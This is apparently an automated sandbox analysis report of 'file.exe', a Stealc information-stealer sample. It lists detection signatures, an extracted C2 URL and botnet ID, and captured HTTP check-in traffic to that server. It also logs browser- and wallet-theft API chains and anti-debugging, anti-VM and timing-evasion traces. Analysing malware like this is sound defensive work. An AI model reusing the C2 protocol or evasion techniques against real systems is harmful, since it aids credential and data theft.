Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541926
MD5: c1dcd48eb2e8b81dfac6e6c4b33a4cee
SHA1: 1f3d8bf70d7cda5a72b8f6c7ddbff264e5a2bbf0
SHA256: 0135c24488681db4642d0052513db7a8a11658c8ee26ec1f31947f3bf0d897cf
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5464 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C1DCD48EB2E8B81DFAC6E6C4B33A4CEE)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 5464 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 5464 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.bf0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-25T10:27:03.731223+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.bf0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00BFC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00BF9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00BF7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00BF9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C08EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C08EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C038B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C04910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BFDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BFE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BFED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C04570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BFF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFF68A FindFirstFileA,0_2_00BFF68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C03EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BF16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BFDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BFBE70

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"D3964EB814973370857647------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00BF4880
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"D3964EB814973370857647------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
Source: file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2112766908.0000000000712000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/I
Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2112766908.0000000000712000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.2112766908.0000000000741000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpiH
Source: file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFD1EE 0_2_00EFD1EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB69E8 0_2_00FB69E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB1998 0_2_00FB1998
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA9190 0_2_00FA9190
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEEAA3 0_2_00EEEAA3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F3A233 0_2_00F3A233
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED03EF 0_2_00ED03EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FAE35E 0_2_00FAE35E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106B2D0 0_2_0106B2D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB8316 0_2_00FB8316
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F25B03 0_2_00F25B03
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB0410 0_2_00FB0410
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB3405 0_2_00FB3405
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F85DAF 0_2_00F85DAF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FAAD0A 0_2_00FAAD0A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA76F0 0_2_00FA76F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F216B9 0_2_00F216B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB4E34 0_2_00FB4E34
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEA62A 0_2_00FEA62A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E97FD1 0_2_00E97FD1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAB7D3 0_2_00EAB7D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A867C 0_2_010A867C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6B760 0_2_00E6B760
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1572F 0_2_00F1572F
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00BF45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: xyustrqz ZLIB complexity 0.9945280771633864
Source: file.exe, 00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C08680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C08680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C03720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C03720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WSERX58K.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1795584 > 1048576
Source: file.exe | Static PE information: Raw size of xyustrqz is bigger than: 0x100000 < 0x190200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.bf0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xyustrqz:EW;fcgrwzmi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xyustrqz:EW;fcgrwzmi:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C09860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c1b71 should be: 0x1c168e
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: xyustrqz
Source: file.exe | Static PE information: section name: fcgrwzmi
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F250E2 push ebx; mov dword ptr [esp], 5BCB2AD2h 0_2_00F2510F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F250E2 push 761C1669h; mov dword ptr [esp], edx 0_2_00F25120
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F250E2 push 5B8CB767h; mov dword ptr [esp], edx 0_2_00F25163
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDD0DC push eax; mov dword ptr [esp], ecx 0_2_00EDD0E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDD0DC push ebp; mov dword ptr [esp], 78F6680Fh 0_2_00EDD136
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDD0DC push 0428AB43h; mov dword ptr [esp], ebx 0_2_00EDD172
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDD0DC push eax; mov dword ptr [esp], 31DD58F9h 0_2_00EDD176
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E558DB push 64262FE1h; mov dword ptr [esp], edi 0_2_00E558E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8D0AB push 4FC3295Dh; mov dword ptr [esp], edx 0_2_00F8D0C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8D0AB push ebp; mov dword ptr [esp], edi 0_2_00F8D0D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8D0AB push ebp; mov dword ptr [esp], esi 0_2_00F8D13D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8D0AB push ebp; mov dword ptr [esp], D6924AE3h 0_2_00F8D141
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8D0AB push edi; mov dword ptr [esp], ebp 0_2_00F8D1AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8D0AB push ebp; mov dword ptr [esp], 4B3B027Ch 0_2_00F8D20A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8D0AB push ecx; mov dword ptr [esp], esi 0_2_00F8D218
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E971 push 702B05D6h; mov dword ptr [esp], ebx 0_2_0107E998
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE2080 push edi; mov dword ptr [esp], ecx 0_2_00FE20FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD5071 push 0F34CEFFh; mov dword ptr [esp], esp 0_2_00FD50B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102D19F push esi; mov dword ptr [esp], edx 0_2_0102D1DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010A99BD push edi; mov dword ptr [esp], edx 0_2_010A9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010919EB push 151789FAh; mov dword ptr [esp], ebx 0_2_01091B5E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0B035 push ecx; ret 0_2_00C0B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010791F8 push eax; mov dword ptr [esp], 76AA7BD4h 0_2_01079298
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010791F8 push 76B064D3h; mov dword ptr [esp], esi 0_2_01079340
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFD1EE push edx; mov dword ptr [esp], 3777CE34h 0_2_00EFD27B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFD1EE push edi; mov dword ptr [esp], ecx 0_2_00EFD323
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFD1EE push edx; mov dword ptr [esp], ecx 0_2_00EFD33F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFD1EE push eax; mov dword ptr [esp], ebx 0_2_00EFD38C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB69E8 push eax; mov dword ptr [esp], 4A308264h 0_2_00FB69F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB69E8 push esi; mov dword ptr [esp], ebp 0_2_00FB6A3A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB69E8 push eax; mov dword ptr [esp], 7D7AF077h 0_2_00FB6A7E
Source: file.exe | Static PE information: section name: xyustrqz entropy: 7.9524401943159875

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13779
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FBD9A2 second address: FBD9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jg 00007F6C1537B646h 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FBD9B5 second address: FBD9BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FBDC9B second address: FBDCED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F6C1537B646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F6C1537B65Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jmp 00007F6C1537B653h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 jl 00007F6C1537B646h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FBDE54 second address: FBDE5E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C14B9223Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC07A0 second address: FC07A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC07A4 second address: FC07AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC07AA second address: FC07AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC07AE second address: FC07C0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC07C0 second address: FC07C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC07C6 second address: FC07CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC07CB second address: FC07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC09CF second address: FC09DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC09DC second address: FC0A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F6C1537B64Ah 0x0000000c nop 0x0000000d pushad 0x0000000e popad 0x0000000f push 00000000h 0x00000011 jmp 00007F6C1537B64Eh 0x00000016 push 6F4C8F1Ah 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FC0A0A second address: FC0A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 6F4C8F9Ah 0x0000000e jmp 00007F6C14B92242h 0x00000013 push 00000003h 0x00000015 mov edi, dword ptr [ebp+122D2DF6h] 0x0000001b push 00000000h 0x0000001d sub cx, 5809h 0x00000022 push 00000003h 0x00000024 mov edx, edi 0x00000026 push esi 0x00000027 sbb ch, 00000042h 0x0000002a pop esi 0x0000002b push AE1DAA17h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F6C14B92246h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FE1FAA second address: FE1FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C1537B652h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1FC2 second address: FE1FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1FC6 second address: FE1FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
